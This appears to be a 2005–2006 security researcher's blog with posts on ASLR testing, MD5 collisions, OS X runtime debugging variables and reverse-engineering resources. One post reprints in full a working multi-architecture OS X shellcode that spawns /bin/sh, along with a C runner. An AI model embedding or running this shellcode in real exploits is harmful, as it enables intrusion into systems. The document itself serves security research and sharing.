Basically, uhooker is a tool to intercept api calls/arbitrary addresses and then use python as the scripting language for the hook handlers. There's no need to recompile anything to hook functinos, and the hook handlers can be changed at runtime (e.g.: you can change the code of the hook handler between two different calls to te same function and everything will continue working).
Take a look at the URL I mentiond before, I spent a little more time trying to describe what uhooker does there :).

Silly bug in gmail chat

2006-02-18T18:58:00.000-03:00

There's a bug in gmail chat. It does not keep track correctly of logged on users.
When someone enters its gmail account, it will appear as online to others.
If that person closes the browser (not the window, the browser) without signing out from gmail first, it will remain in online state for the rest of this contacts. And from that point on, his state cannot be trusted, even if you logout the contact can appear as online.
I think adding <body onunload="signout"> can solve this.

So if you see online contacts when reading your email and you send messages to them and they do not answer, maybe they're not online :).

Wehnus Wehntrust (Address Space Layout Randomization)

2006-01-21T21:01:00.000-03:00

The other day someone sent me a link to www.wehntrust.com, made by a company called Wehnus.
as its web site states, it is a "Host-based Instrustion Prevention System (HIPS) that
provides secure buffer overflow exploitation countermeasures." [..]
[..] "WenhTrust implements Address Space Randomization (ASLR) for Windows".
There are two versions available, one for commercial user and one for home users.
Both versions have different features:

Home version features:

Randomized Image Files (DLLs, EXEs with relocations)
Randomized Memory Allocations (Stack, Heap, etc)
Randomized PEB/TEB
Application and Image File Randomization Exemptions

Commercial Version features:

Same feature set as the home user version
Native event logging when exploitation occurs
Balloon tip notifications when an exploit is detected
SEH overwrite prevention
Format string vulnerability prevention
Stack overflow detection
Brute force detection and prevention

This product looks very nice so I installed it on my home computer and so far
I did not have any stability problems. I did some tests
quick tests, this is not intented to be a full review of the product, just me
playing around for 2 minutes with the product:

The Randomized Memory Allocations seem to be working fine, sample program:

void main()

{
char *p;
int i;
unsigned int espvalue;

_asm {    mov  [espvalue], esp }
printf("esp: %X\n", espvalue);

 for ( i = 0; i < 7; i++) {
    p = malloc(2000);
    printf("%p\n", p);

 }
}

Output:


C:\tmp>test
esp: 5708FED8
572F0758
572F0758
572F0758
572F0758
572F0758
572F0758
572F0758

C:\tmp>test
esp: 372CFED8
37510758
37510758
37510758
37510758
37510758
37510758
37510758

C:\tmp>test
esp: 4151FED8
41790758
41790758
41790758
41790758
41790758
41790758
41790758

C:\tmp>test
esp: 48CDFED8
48F70758
48F70758
48F70758
48F70758
48F70758
48F70758
48F70758

C:\tmp>

This was tested on a WinXP SP2. Running the test without wehntrust shows
the same addresses on every execution (for both esp and heap address).
I did not test PEB randomization because it is already done in XP SP2 and I
didn't care much for it anyways. You can observe that how randomization
is performed is pretty clear.

To test the "Randomized Image Files (DLLs, EXEs with relocations)" feature
I wrote this simple program:

void main()
{
printf("%x\n", LoadLibrary("kernel32.dll"));
printf("%x\n", LoadLibrary("ntdll.dll"));
printf("%x\n", LoadLibrary("advapi32.dll"));
printf("%x\n", LoadLibrary("wsock32.dll"));
printf("%x\n", GetModuleHandle(NULL));
}

Output:


C:\tmp>test3
1b0a0000
1ac30000
1b230000
1ddd0000
400000

C:\tmp>test3
1b0a0000
1ac30000
1b230000
1ddd0000
400000

C:\tmp>test3
1b0a0000
1ac30000
1b230000
1ddd0000
400000

The product documentation says it only randomizes PE files with relocations, and my
PE file (as almost any regular EXE PE file) does not have relocation info, so
getting 400000 for GetModuleHandle(NULL) is expected. For the other dlls, the
address shown is in fact not the default one for the dlls, but as you can see,
the address does not change on a per execution basis.

Taking advantage of MD5 .. for real..

2005-12-16T18:37:00.000-03:00

Recently, news about md5 being broken started circulating again, along with the news came along a lot of speculation and misinformation about what the new (and not so new) found attacks can really be used for.
Well, as always, gera (aka Gerardo Richarte) did something real and useful, he created very quickly a presentation he gave at pacsec. The presentation entitled "MD5 to be considered harmful today" can be found here.
It is a very cool presentation, the slides are not very descriptive if you are not familiar with
md5 and the issue in question (they're only slides after all, not a paper), but he did a lot of cool
things to understand and reproduce (most things he did I did not get :)) what the publicated paper with the new attack was actually saying; the paper was only a page long and only contained a table with some collisions and a very brief explanation.

He did something even better; he created a lot of collisions. For example, he created TWO EXECUTABLE FILES THAT HAVE THE SAME MD5 HASH BUT ARE TOTALLY DIFFERENT APPLICATIONS, that's useful, I say!.
You can take a look at the files here:

Attack Trees are .. mm.. fun...

2005-12-13T11:49:00.000-03:00

This is a screenshot from the demo found on Amenaza.com, a company that builds a
software to create Attack trees.
Isn't it great what you can do with these tools?

OSX - multi arch shellcode

2005-11-16T10:30:00.000-03:00

according to this post in full-disclosure, this guy (nemo_at_felinemenace.org) created a multi-arch (x86 and ppc) shellcode for OSX. I haven't checked it yet, so for all I know, it may not work or do a 'rm -rf /', so beware, don't go running this thing without checking it first.

Note that more than a 'multi arch' shellcode, these are two different shellcodes, which one is executed is decided by the interpretation of the first bytes "\x5f\x90\xeb\x48" by the different processors as explained by the author below.

The link is in insecure.org mailing list archives, so just in case, here's the shellcode:


--------------------// CODE //--------------------
/*
 * -[ dual.c ]-
 * by nemo_at_felinemenace.org
 *
 * execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode
 * for osx (both the ppc and x86 version.)
 *
 * Sample output:
 *
 * -[nemo_at_squee:~/shellcode]$ file dual-ppc
 * dual-ppc: Mach-O executable ppc
 * -[nemo_at_squee:~/shellcode]$ ./dual-ppc
 * sh-2.05b$ exit
 *
 * -[nemo_at_squee:~/shellcode]$ file dual-x86
 * dual-x86: Mach-O executable i386
 * -[nemo_at_squee:~/shellcode]$ ./dual-x86
 * sh-2.05b$ exit
 */

char dual[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"

// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"

// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";

int main(int ac, char **av)
{
        void (*fp)() = dual;
        fp();
}

NSA guide to secure OSX 10.3

2005-11-08T11:15:00.000-03:00

Check out this guide, its an interesting reading. See the "References" section, it seems the whole document was written by extracting parts from different books.

http://www.nsa.gov/snac/os/applemac/I331-009R-2004.pdf

Observe OSX programs behavior using environment variables

2005-11-06T23:55:00.000-03:00

it is possible to observe OSX programs behavior that use the objective-c runtime by setting the following variables

LaunchingDebug
OBJC_PRINT_BIND
OBJC_DUMP_CLASSES

The information dumped by the objective-c runtime when these variables are set can be very handy, specially when analyzing programs for which you don't have the source code.

The source code that uses these environment variables to dump the information can be found at http://darwinsource.opendarwin.org/10.3.7/objc4-237/runtime/objc-runtime.m

the function objc_setConfiguration() obtains the values of 'LaunchingDebug' and 'OBJC_PRINT_BIND':

[..]
static void objc_setConfiguration() {
if ( LaunchingDebug == -1 ) {
// watch image loading and binding
LaunchingDebug = getenv("LaunchingDebug") != NULL;
}
if ( PrintBinding == -1 ) {
PrintBinding = getenv("OBJC_PRINT_BIND") != NULL;
}
}
[..]

the function objc_map_image obtains the value of 'OBJC_DUMP_CLASSES' :

[..]
static void _objc_map_image(headerType *mh, unsigned long vmaddr_slide)
{
static int dumpClasses = -1;
[..]
if ( dumpClasses == -1 ) {
if ( getenv("OBJC_DUMP_CLASSES") ) dumpClasses = 1;
else dumpClasses = 0;
}
[..]

Next is a list of the functions that use each environment variable:

OBJC_PRINT_BIND

+ _objc_map_image
+ _objc_bindModuleContainingCategory
+ _objc_bindModuleContainingClass

LaunchingDebug

+ _objc_map_image

OBJC_DUMP_CLASSES

+ _objc_map_image

OBJC_PRINT_BIND as the name implies, prints log information about categories and classes that
are binded by the objective-c runtime.
LaunchingDebug logs information about 'modules' loaded.
OBJC_DUMP_CLASSES logs.. mm. yes, classes.

sample output of OBJC_PRINT_BIND when running iMovie

The list of classes and categories logged can be very useful to know what is that the program is doing.
Apart from looking at the classes while the program is loading, you can associate an action in the program to the classes/categories used when that action is performed.

For example,

+ open a Terminal window
+ set the OBJC_PRINT_BIND function variable (e.g.: export OBJC_PRINT_BIND = 1)
+ run iMovie (found at /Applications/iMovie.app/Contents/MacOS/)
+ Once iMovie is loaded, click on the 'File' menu item, and you'll see the following in the Terminal window

objc: binding class NSPortNameServer
objc: binding class NSMachBootstrapServer
objc: binding class %NSMachPort
objc: binding class NSMachPort
objc: binding class NSDistributedObjectsStatistics
objc: binding class NSDistantObject
objc: binding class NSPortCoder
objc: binding class NSConcretePortCoder
objc: binding class NSDOStreamData
objc: binding class NSPortMessage
objc: binding category NSPortMessage(NSPortMessageMachPortAdditions)
objc: binding class NSServicesMenuHandler

These are the classes/categories that were bind when you clicked on the 'File' menu item, what can
give you a hint about what the program is doing. Remember that what is logged are the classes/categories that were bind when you click the menu item, meaning that the classes/categories that
were bind before will not be shown now, so the list of classes/categories listed is NOT the whole list of
classes/categories used by the code responding to the activation of the 'File' menu item. For the same reason, if you click on the 'File' menu item again, no information will be logged.

sample output of LaunchingDebug when running iMovie

LaunchingDebug shows the modules/images loaded.

sample output of OBJC_DUMP_CLASSES when running iMovie

I don't know exactly what it means, but I guess that is the list of Classes implemented by the loaded module. If this is the case, this information is not that useful. I'll have check this in the future and update this posting.

There are also a bunch of other environment variables that are very interesting. I'll post information
about them in the near future.

MS SQL Server 2000 Won't bind to TCP/IP ports

2005-11-04T17:43:00.000-03:00

I spent like an hour today trying to figure out why the MSSQL server I installed was not binding to the tcp/ip ports. After a while, browsing thru the thousands of events created by MSSQL server (and other apps) on the Event Log, I found that the TCP/IP ports were closed because WinXP (or whatever) detected that the installed version of MSSQL server was a vulnerable version that required patching.

Its nice to see these 'protection mechanism', but I would REALLY REALLY REALLY like to have a more visual/direct indication of whats going on. See the screenshot of the event log record, observe that the Event is of type 'Information' what doesn't help to identify it when you are browsing thru a zillion events.

IDA Plugin Writing Tutorial

2005-11-03T12:55:00.000-03:00

If you've ever tried creating an IDA plugin without the help of any human being, or text written by a human being (or alike), you will join me and thank Steve Micallef for writing this tutorial.

Ida Plugin Writing Tutorial

A little tiny survey at SANS

2005-11-03T12:16:00.000-03:00

Just yesterday I was taking a survey promoted by SANS called "Information Security Career Advancement Survey". I couldn't help to notice the format of the url:

http://survey.sans.org/phpsurveyor/index.php?sid=1

I had to try.. take a look at this survey: :)

Teeny Tiny Test

A couple of good articles on OS X internals

2005-11-03T11:56:00.000-03:00

The following articles are nice to read

Sample on how to crack a PPC app.

OSX Heap Explotation Techniques
Nice description of the heap.